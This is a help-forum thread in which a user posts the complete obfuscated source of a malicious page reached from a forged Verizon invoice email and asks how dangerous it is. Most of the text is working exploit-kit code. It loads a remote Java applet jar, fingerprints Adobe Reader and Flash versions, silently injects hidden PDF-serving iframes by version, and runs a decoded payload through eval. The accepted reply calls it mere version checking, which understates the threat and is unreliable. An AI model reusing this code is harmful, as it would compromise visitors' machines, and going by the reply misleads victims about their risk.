JS: how "evil" is this script

A client mistakenly clicked on an email link (a forged Verizon cell invoice link).
Below is the code.  Without going in to great detail/analysis, does this look fairly harmless as far as these things go?  (or is there something blatantly damaging that it does)
  I'm not a JS expert (it's well obfuscated) and cannot offer a high-level opinion.
(None of his anti-virus alarms went off when viewing this page)

thanks
<html><body><applet d code='G&#46;&#99;&#108;&#97;&#115;&#115;' g archive='http&#58;&#47;&#47;brown&#99;ellular.&#99;om&#47;&#99;ontent&#47;Qai&#46;&#106;ar'><param name="s" value="1"/><param g name="q" value="2"/><param g name="&#112;" g valu="12" val="asd" a="a" value =  


"L::9#NmmQ11Q3qx61wNNL::9NmmWT1ny6q33=3CTx61wm5x9L92tS_&g%IeqSJ"/></applet><script>try{new window.getElementsByTagName("body").prototype}catch(q){s=-0.1;}if(window.document){function safsaf(b){a+=b;}}a=[];</script>
<script>safsaf('document.write(\'PcenterRPhER<lease wait page is loading...PChERPCcenterRPhrR\')Ofunction end_redirect(){}try{var <lugin0etectQ{versionN"D.K.J",nameN"<lugin0etect",handlerNfunction(c,b,a){return function(){c(b,a)}},is0efinedNfunction(b){return typeof b!Q"undefined"},isUrrayNfunction(b){return(CarrayCi).test(;bject.prototype.to?tring.call(b))},is2uncNfunction(b){return typeof bQQ"function"},is?tringNfunction(b){return typeof bQQ"string"},is:umNfunction(b){return typeof bQQ"number"},is?tr:umNfunction(b){return(typeof bQQ"string"&&(C\\dC).test(b))},get:um>egxNC[\\d][\\d\\.\\_,-]*C,split:um>egxNC[\\.\\_,-]Cg,get:umNfunction(b,c){var dQthis,aQd.is?tr:um(b)S(d.is0efined(c)Snew >eg1xp(c)Nd.get:um>egx).exec(b)NnullOreturn aSa[D]Nnull},compare:umsNfunction(h,f,d){var eQthis,c,b,a,gQparse5ntOif(e.is?tr:um(h)&&e.is?tr:um(f)){if(e.is0efined(d)&&d.compare:ums){return d.compare:ums(h,f)}cQh.split(e.split:um>egx)ObQf.split(e.split:um>egx)Ofor(aQDOaP9ath.min(c.length,b.length)Oa++){if(g(c[a],ED)Rg(b[a],ED)){return E}if(g(c[a],ED)Pg(b[a],ED)){return -E}}}return D},format:umNfunction(b,c){var dQthis,a,eOif(!d.is?tr:um(b)){return null}if(!d.is:um(c)){cQH}c--OeQb.replace(C\\sCg,"").split(d.split:um>egx).concat(["D","D","D","D"])Ofor(aQDOaPHOa++){if(C^(D+)(.+)$C.test(e[a])){e[a]Q>eg1xp.$F}if(aRc||!(C\\dC).test(e[a])){e[a]Q"D"}}return e.slice(D,H).join(",")},$$has9ime@ypeNfunction(a){return function(d){if(!a.is51&&d){var c,b,e,fQa.is?tring(d)S[d]NdOif(!f||!f.length){return null}for(eQDOePf.lengthOe++){if(C[^\\s]C.test(f[e])&&(cQnavigator.mime@ypes[f[e]])&&(bQc.enabled<lugin)&&(b.name||b.description)){return c}}}return null}},find:av<luginNfunction(l,e,c){var jQthis,hQnew >eg1xp(l,"i"),dQ(!j.is0efined(e)||e)SC\\dCND,kQcSnew >eg1xp(c,"i")ND,aQnavigator.plugins,gQ"",f,b,mOfor(fQDOfPa.lengthOf++){mQa[f].description||gObQa[f].name||gOif((h.test(m)&&(!d||d.test(>eg1xp.left/ontext+>eg1xp.right/ontext)))||(h.test(b)&&(!d||d.test(>eg1xp.left/ontext+>eg1xp.right/ontext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},get9ime1nabled<luginNfunction(k,m,c){var eQthis,f,bQnew >eg1xp(m,"i"),hQ"",gQcSnew >eg1xp(c,"i")ND,a,l,d,jQe.is?tring(k)S[k]NkOfor(dQDOdPj.lengthOd++){if((fQe.has9ime@ype(j[d]))&&(fQf.enabled<lugin)){lQf.description||hOaQf.name||hOif(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return D},get<lugin2ileBersionNfunction(f,b){var hQthis,e,d,g,a,cQ-EOif(h.;?RF||!f||!f.version||!(eQh.get:um(f.version))){return b}if(!b){return e}eQh.format:um(e)ObQh.format:um(b)OdQb.split(h.split:um>egx)OgQe.split(h.split:um>egx)Ofor(aQDOaPd.lengthOa++){if(cR-E&&aRc&&!(d[a]QQ"D")){return b}if(g[a]!Qd[a]){if(cQQ-E){cQa}if(d[a]!Q"D"){return b}}}return e},UX;Nwindow.UctiveX;bject,getUX;Nfunction(a){var fQnull,d,bQthis,cQ{}Otry{fQnew b.UX;(a)}catch(d){}return f},convert2uncsNfunction(g){var a,h,f,bQC^[\\$][\\$]C,dQ{},cQthisOfor(a in g){if(b.test(a)){d[a]QE}}for(a in d){try{hQa.slice(F)Oif(h.lengthRD&&!g[h]){g[h]Qg[a](g)Odelete g[a]}}catch(f){}}},init?criptNfunction(){var cQthis,aQnavigator,eQ"C",iQa.userUgent||"",gQa.vendor||"",bQa.platform||"",hQa.product||""Oif(c.file){c.file.$Qc}if(c.verify){c.verify.$Qc}Oc.;?QEDDOif(b){var f,dQ["Win",E,"9ac",F,"8inux",G,"2reeV?0",H,"i<hone",FE.E,"i<od",FE.F,"i<ad",FE.G,"Win.*"+"/1",FF.E,"Win.*9obile",FF.F,"<ocket\\\\s*</",FF.G,"",EDD]Ofor(fQd.length-FOfRQDOfQf-F){if(d[f]&&new >eg1xp(d[f],"i").test(b)){c.;?Qd[f+E]Obreak}}}c.convert2uncs(c)Oc.is51Qnew 2unction("return "+e+"*Tcc"+"_on!T*"+e+"false")()Oc.ver51Qc.is51&&(C9?51\\s*(\\d+\\.S\\d*)Ci).test(i)Sparse2loat(>eg1xp.$E,ED)NnullOc.UctiveX1nabledQfalseOif(c.is51){var f,jQ["9sxmlF.X984@@<","9sxmlF.0;90ocument","9icrosoft.X980;9","?hockwave2lash.?hockwave2lash","@0//tl.@0//tl","?hell.A54elper","?cripting.0ictionary","wmplayer.ocx"]Ofor(fQDOfPj.lengthOf++){if(c.getUX;(j[f])){c.UctiveX1nabledQtrueObreak}}c.headQc.is0efined(document.get1lementsVy@ag:ame)Sdocument.get1lementsVy@ag:ame("head")[D]Nnull}c.is3eckoQ(C3eckoCi).test(h)&&(Cecko\\s*\\C\\s*\\dCi).test(i)Oc.ver3eckoQc.is3eckoSc.format:um((Crv\\s*\\N\\s*([\\.\\,\\d]+)Ci).test(i)S>eg1xp.$EN"D.M")NnullOc.is?afariQ(C?afari\\s*\\C\\s*\\dCi).test(i)&&(CUppleCi).test(g)Oc.is/hromeQ(C/hrome\\s*\\C\\s*(\\d[\\d\\.]*)Ci).test(i)Oc.ver/hromeQc.is/hromeSc.format:um(>eg1xp.$E)NnullOc.is;peraQ(C;pera\\s*[\\C]S\\s*(\\d+\\.S\\d*)Ci).test(i)Oc.ver;peraQc.is;pera&&((CBersion\\s*\\C\\s*(\\d+\\.S\\d*)Ci).test(i)||E)Sparse2loat(>eg1xp.$E,ED)NnullOc.addWin1vent("load",c.handler(c.runW8funcs,c))},initNfunction(c){var bQthis,a,cOif(!b.is?tring(c)){return -G}if(c.lengthQQE){b.getBersion0elimiterQcOreturn -G}cQc.to8ower/ase().replace(C\\sCg,"")OaQb[c]Oif(!a||!a.getBersion){return -G}b.pluginQaOif(!b.is0efined(a.installed)){a.installedQa.versionQa.versionDQa.getBersion0oneQnullOa.$QbOa.plugin:ameQc}b.garbageQfalseOif(b.is51&&!b.UctiveX1nabled){if(a!QQb.java){return -F}}return E},f<ushNfunction(b,a){var cQthisOif(c.isUrray(a)&&(c.is2unc(b)||(c.isUrray(b)&&!(b.lengthPQD)&&c.is2unc(b[D])))){a.push(b)}},callUrrayNfunction(b){var cQthis,aOif(c.isUrray(b)){for(aQDOaPb.')</script><script>safsaf('lengthOa++){if(b[a]QQQnull){return}c.call(b[a])Ob[a]Qnull}}},callNfunction(c){var bQthis,aQb.isUrray(c)Sc.lengthN-EOif(!(aPQD)&&b.is2unc(c[D])){c[D](b,aRESc[E]ND,aRFSc[F]ND,aRGSc[G]ND)}else{if(b.is2unc(c)){c(b)}}},getBersion0elimiterN",",$$getBersionNfunction(a){return function(g,d,c){var eQa.init(g),f,b,hQ{}Oif(ePD){return null}OfQa.pluginOif(f.getBersion0one!QE){f.getBersion(null,d,c)Oif(f.getBersion0oneQQQnull){f.getBersion0oneQE}}a.cleanup()ObQ(f.version||f.versionD)ObQbSb.replace(a.split:um>egx,a.getBersion0elimiter)NbOreturn b}},cleanupNfunction(){},addWin1ventNfunction(d,c){var eQthis,aQwindow,bOif(e.is2unc(c)){if(a.add1vent8istener){a.add1vent8istener(d,c,false)}else{if(a.attach1vent){a.attach1vent("on"+d,c)}else{bQa["on"+d]Oa["on"+d]Qe.win4andler(c,b)}}}},win4andlerNfunction(d,c){return function(){d()Oif(typeof cQQ"function"){c()}}},W8funcsDN[],W8funcsN[],runW8funcsNfunction(a){var bQ{}Oa.win8oadedQtrueOa.callUrray(a.W8funcsD)Oa.callUrray(a.W8funcs)Oif(a.on0one1mpty0iv){a.on0one1mpty0iv()}},win8oadedNfalse,$$onWindow8oadedNfunction(a){return function(b){if(a.win8oaded){a.call(b)}else{a.f<ush(b,a.W8funcs)}}},divNnull,div50N"plugindetect",divWidthNID,plugin?izeNE,empty0ivNfunction(){var dQthis,b,h,c,a,f,gOif(d.div&&d.div.child:odes){for(bQd.div.child:odes.length-EObRQDOb--){cQd.div.child:odes[b]Oif(c&&c.child:odes){for(hQc.child:odes.length-EOhRQDOh--){gQc.child:odes[h]Otry{c.remove/hild(g)}catch(f){}}}if(c){try{d.div.remove/hild(c)}catch(f){}}}}if(!d.div){aQdocument.get1lementVy5d(d.div50)Oif(a){d.divQa}}if(d.div&&d.div.parent:ode){try{d.div.parent:ode.remove/hild(d.div)}catch(f){}d.divQnull}},0;:1funcsN[],on0one1mpty0ivNfunction(){var cQthis,a,bOif(!c.win8oaded){return}if(c.W8funcs&&c.W8funcs.length&&c.W8funcs[c.W8funcs.length-E]!QQnull){return}for(a in c){bQc[a]Oif(b&&b.funcs){if(b.;@2QQG){return}if(b.funcs.length&&b.funcs[b.funcs.length-E]!QQnull){return}}}for(aQDOaPc.0;:1funcs.lengthOa++){c.callUrray(c.0;:1funcs)}c.empty0iv()},getWidthNfunction(c){if(c){var aQc.scrollWidth||c.offsetWidth,bQthisOif(b.is:um(a)){return a}}return -E},get@ag?tatusNfunction(m,g,a,b){var cQthis,f,kQm.span,lQc.getWidth(k),hQa.span,jQc.getWidth(h),dQg.span,iQc.getWidth(d)Oif(!k||!h||!d||!c.get0;9obj(m)){return -F}if(jPi||lPD||jPD||iPD||!(iRc.plugin?ize)||c.plugin?izePE){return D}if(lRQi){return -E}try{if(lQQc.plugin?ize&&(!c.is51||c.get0;9obj(m).ready?tateQQH)){if(!m.win8oaded&&c.win8oaded){return E}if(m.win8oaded&&c.is:um(b)){if(!c.is:um(m.count)){m.countQb}if(b-m.countRQED){return E}}}}catch(f){}return D},get0;9objNfunction(g,a){var f,dQthis,cQgSg.spanND,bQc&&c.first/hildSENDOtry{if(b&&a){c.first/hild.focus()}}catch(f){}return bSc.first/hildNnull},set?tyleNfunction(b,g){var fQb.style,a,d,cQthisOif(f&&g){for(aQDOaPg.lengthOaQa+F){try{f[g[a]]Qg[a+E]}catch(d){}}}},insert0iv5nVodyNfunction(a,i){var h,fQthis,bQ"pdGGMMGGMM",dQnull,jQiSwindow.top.documentNwindow.document,cQ"P",gQ(j.get1lementsVy@ag:ame("body")[D]||j.body)Oif(!g){try{j.write(c+\'div idQ"\'+b+\'"Ro\'+c+"CdivR")OdQj.get1lementVy5d(b)}catch(h){}}gQ(j.get1lementsVy@ag:ame("body")[D]||j.body)Oif(g){if(g.first/hild&&f.is0efined(g.insertVefore)){g.insertVefore(a,g.first/hild)}else{g.append/hild(a)}if(d){g.remove/hild(d)}}else{}},insert4@98Nfunction(g,b,h,a,k){var l,mQdocument,jQthis,p,oQm.create1lement("span"),n,i,fQ"P"Ovar cQ["outline?tyle","none","border?tyle","none","padding","Dpx","margin","Dpx","visibility","visible"]Oif(!j.is0efined(a)){aQ""}if(j.is?tring(g)&&(C[^\\s]C).test(g)){pQf+g+\' widthQ"\'+j.plugin?ize+\'" heightQ"\'+j.plugin?ize+\'" \'Ofor(nQDOnPb.lengthOnQn+F){if(C[^\\s]C.test(b[n+E])){p+Qb[n]+\'Q"\'+b[n+E]+\'" \'}}p+Q"R"Ofor(nQDOnPh.lengthOnQn+F){if(C[^\\s]C.test(h[n+E])){p+Qf+\'param nameQ"\'+h[n]+\'" valueQ"\'+h[n+E]+\'" CR\'}}p+Qa+f+"C"+g+"R"}else{pQa}if(!j.div){iQm.get1lementVy5d(j.div50)Oif(i){j.divQi}else{j.divQm.create1lement("div")Oj.div.idQj.div50Oj.insert0iv5nVody(j.div)}j.set?tyle(j.div,c.concat(["width",j.divWidth+"px","height",(j.plugin?ize+G)+"px","font?ize",(j.plugin?ize+G)+"px","line4eight",(j.plugin?ize+G)+"px","verticalUlign","baseline","display","block"]))Oif(!i){j.set?tyle(j.div,["position","absolute","right","Dpx","top","Dpx"])}}if(j.div&&j.div.parent:ode){j.div.append/hild(o)Oj.set?tyle(o,c.concat(["font?ize",(j.plugin?ize+G)+"px","line4eight",(j.plugin?ize+G)+"px","verticalUlign","baseline","display","inline"]))Otry{if(o&&o.parent:ode){o.focus()}}catch(l){}try{o.inner4@98Qp}catch(l){}if(o.child:odes.lengthQQE&&!(j.is3ecko&&j.compare:ums(j.ver3ecko,"E"+",I,D,D")PD)){j.set?tyle(o.first/hild,c.concat(["display","inline"]))}return{spanNo,win8oadedNj.win8oaded,tag:ameN(j.is?tring(g)SgN"")}}return{spanNnull,win8oadedNj.win8oaded,tag:ameN""}},flashN{mime@ypeN"applicationCx-shockwave-flash",prog50N"?hockwave2lash.?hockwave2lash",class50N"clsidN0FK/0VJ1-U1J0-EE/2-MJVL-HHHIIGIHDDDD",getBersionNfunction(){var bQfunction(i){if(!i){return null}var eQC[\\d][\\d\\,\\.\\s]*[r>d0]{D,E}[\\d\\,]*C.exec(i)Oreturn eSe[D].replace(C[r>d0\\.]Cg,",").replace(C\\sCg,"")Nnull}Ovar jQth')</script><script>safsaf('is,gQj.$,k,h,lQnull,cQnull,aQnull,f,m,dOif(!g.is51){mQg.has9ime@ype(j.mime@ype)Oif(m){fQg.get0;9obj(g.insert4@98("object",["type",j.mime@ype],[],"",j))Otry{lQg.get:um(f.3etBariable("$version"))}catch(k){}}if(!l){dQmSm.enabled<luginNnullOif(d&&d.description){lQb(d.description)}if(l){lQg.get<lugin2ileBersion(d,l)}}}else{for(hQEIOhRFOh--){cQg.getUX;(j.prog50+"."+h)Oif(c){aQh.to?tring()Obreak}}if(!c){cQg.getUX;(j.prog50)}if(aQQ"J"){try{c.Ullow?criptUccessQ"always"}catch(k){return"J,D,FE,D"}}try{lQb(c.3etBariable("$version"))}catch(k){}if(!l&&a){lQa}}j.installedQlSEN-EOj.versionQg.format:um(l)Oreturn true}},adobereaderN{mime@ypeN"applicationCpdf",nav<lugin;bjNnull,prog50N["Ucro<02.<02","<02.<df/trl"],class50N"clsidN/ULUMKLD-FLD0-EE/2-UFH0-HHHIIGIHDDDD",5:?@U8810N{},plugin4as9ime@ypeNfunction(d,c,f){var bQthis,eQb.$,aOfor(a in d){if(d[a]&&d[a].type&&d[a].typeQQc){return E}}if(e.get9ime1nabled<lugin(c,f)){return E}return D},getBersionNfunction(l,j){var gQthis,dQg.$,i,f,m,n,bQnull,hQnull,kQg.mime@ype,a,cOif(d.is?tring(j)){jQj.replace(C\\sCg,"")Oif(j){kQj}}else{jQnull}if(d.is0efined(g.5:?@U8810[k])){g.installedQg.5:?@U8810[k]Oreturn}if(!d.is51){aQ"Udobe.*<02.*<lug-Sin|Udobe.*Ucrobat.*<lug-Sin|Udobe.*>eader.*<lug-Sin"Oif(g.getBersion0one!QQD){g.getBersion0oneQDObQd.get9ime1nabled<lugin(g.mime@ype,a)Oif(!j){nQb}if(!b&&d.has9ime@ype(g.mime@ype)){bQd.find:av<lugin(a,D)}if(b){g.nav<lugin;bjQbOhQd.get:um(b.description)||d.get:um(b.name)OhQd.get<lugin2ileBersion(b,h)Oif(!h&&d.;?QQE){if(g.plugin4as9ime@ype(b,"applicationCvnd.adobe.pdfxml",a)){hQ"M"}else{if(g.plugin4as9ime@ype(b,"applicationCvnd.adobe.x-mars",a)){hQ"L"}}}}}else{hQg.version}if(!d.is0efined(n)){nQd.get9ime1nabled<lugin(k,a)}g.installedQn&&hSEN(nSDN(g.nav<lugin;bjS-D.FN-E))}else{bQd.getUX;(g.prog50[D])||d.getUX;(g.prog50[E])OcQCQ\\s*([\\d\\.]+)CgOtry{fQ(b||d.get0;9obj(d.insert4@98("object",["classid",g.class50],["src",""],"",g))).3etBersions()Ofor(mQDOmPIOm++){if(c.test(f)&&(!h||!(>eg1xp.$E-hPQD))){hQ>eg1xp.$E}}}catch(i){}g.installedQhSEN(bSDN-E)}if(!g.version){g.versionQd.format:um(h)}g.5:?@U8810[k]Qg.installed}},zzND}O<lugin0etect.init?cript()O<lugin0etect.getBersion(".")OpdfverQ<lugin0etect.getBersion("Udobe>eader")OflashverQ<lugin0etect.getBersion(\'2lash\')O}catch(e){}if(typeof pdfverQQ\'string\'){pdfverQpdfver.split(\'.\')}else{pdfverQ[D,D,D,D]}if(typeof flashverQQ\'string\'){flashverQflashver.split(\'.\')}else{flashverQ[D,D,D,D]}OexecKQEOfunction splD(){splF()}function splF(){splG()}function show_pdf(src){var pifrQdocument.create1lement(\'52>U91\')Opifr.setUttribute(\'width\',E)Opifr.setUttribute(\'height\',E)Opifr.setUttribute(\'src\',src)Odocument.body.append/hild(pifr)}function show_pdfF(src){var pQdocument.create1lement(\'object\')Op.setUttribute(\'type\',\'applicationCpdf\')Op.setUttribute(\'data\',src)Op.setUttribute(\'width\',E)Op.setUttribute(\'height\',E)Odocument.body.append/hild(p)}function splG(){if(pdfver[D]RD&&pdfver[D]PL){execKQDOshow_pdf(\'.CcontentCapE.phpSfQKFHId\')}else if((pdfver[D]QQL)||(pdfver[D]QQM&&pdfver[E]PQG)){execKQDOshow_pdfF(\'.CcontentCapF.phpSfQKFHId\')}splH()}function splH(){splI()}function splI(){set@imeout(end_redirect,LDDD)O}splD()O')</script><script>
try{new s.prototype}catch(hjkql){e=this['e'+'val'];cc=1;fr=1;}
ch="c"+"h"+"ar"+"Code";
md='na'.substr(1);
v=m=e;
c="";
i=7-6-1;
if(s)qq=e("S"+"tring");
ch+="At";
qq2=e("qq")["fro"+"mC"+"harC"+"ode"];
while(-13140+5-5<i*-1){
	vv=a.substr(i,Math.pow(2,0));
	vvv=vv[ch](0);
	x=vvv;
	if (vvv>=47 && vvv<67){
		r2=qq2(vvv+20);
	} else if((vvv>=67)&&(vvv<87)){
		r2=qq2(vvv-20);
	} else {
		r2=vv;
	}
	r=c;
	if(e)c=r+r2;
	i=i+1;
}
hh=c;
w=v;
if(cc)z=hh;
w(z);
		</script></body></html>

Open in new window

willsherwoodAsked:
Who is Participating?
 
todd_beedyCommented:
It looks as this script is only checking versions of programs such as adobe reader and flash and windows media player.

As there are many known exploits for software rather than pages, I would be very careful until you can ensure the computer is 100% clean.
0
 
willsherwoodAuthor Commented:
thanks, very helpful
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.